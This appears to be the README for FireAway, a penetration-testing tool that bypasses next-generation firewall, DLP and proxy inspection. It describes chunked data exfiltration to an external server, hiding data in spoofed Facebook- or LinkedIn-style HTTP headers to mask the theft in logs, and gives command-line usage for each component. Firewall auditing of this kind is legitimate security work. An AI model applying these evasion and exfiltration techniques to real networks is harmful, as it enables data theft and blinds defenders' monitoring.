FireAway-Next Generation Firewall Bypass Tool

v0.2

Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls, as well as other deep packet inspection defense mechanisms such as data loss prevention (DLP) and application-aware proxies. These tactics rely on two principles: the NGFW has to allow a connection to establish before it can see any layer 7 data to filter, and spoofed application headers make a communication channel look like normal user traffic (such as Internet surfing) in the firewall logs. To bypass data loss prevention tools, Fireaway sends data in small "chunks" that do not match regular expression triggers and other DLP rules, and embeds data in spoofed HTTP headers of legitimate applications, which most data loss prevention technologies are not designed to inspect. The tool has also had success defeating anomaly detection and heuristics engines through its ability to spoof application headers and hide data inside them.

Starting the FireAway Server: Typically the FireAway server would be started on the egress side of the firewall (such as a server on the Internet), and listen on a port believed to be closed to see if any application based rules allow traffic out on this port, or to receive raw data chunks to see if DLP or application proxies can identify them:

python fa_server.py <port to listen on> <mode number>

The server can be started in four modes:

All data received by the server on the specified port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server sees the same or a lower amount of data on two consecutive runs (indicating that firewall filtering has kicked in), the following message is printed on the server console:

Got the same or lower amount of data on two consecutive runs.  If sending test data, maximum data leak size may have been reached.

Starting the FireAway Client/Application Spoofer: The FireAway client has three modes:

To start the basic client:

python fa_client.py <FireAway server IP or path of server list file> <Fireaway Server Port> <Client mode>

The list of servers should be a simple text file containing a list of IP addresses, one per line. If only using one server, a single IP can be specified instead.

The application spoofing client has three modes:

To start the application spoofing client:

python fa_spoof.py <FireAway Server IP or path of server list file> <Fireaway Server Port> <Client mode>

Application spoofing will randomly insert HTTP headers inside legitimate-looking application headers (e.g. Facebook, LinkedIn, etc.) carrying the data chunks, polluting the logs with various applications in order to mask the data exfiltration.

Fireaway Reassembler: The Fireaway reassembler (fa_assembler.py) is used to reassemble data received by the Fireaway servers. The assembler has three modes, which correspond to the mode of the servers that received the data:

To start the reassembler:

python fa_assembler.py <reassembly mode> <comma separated paths to files to reassemble>

Output will be saved to the filename specified.

Please report any issues or questions through GitHub.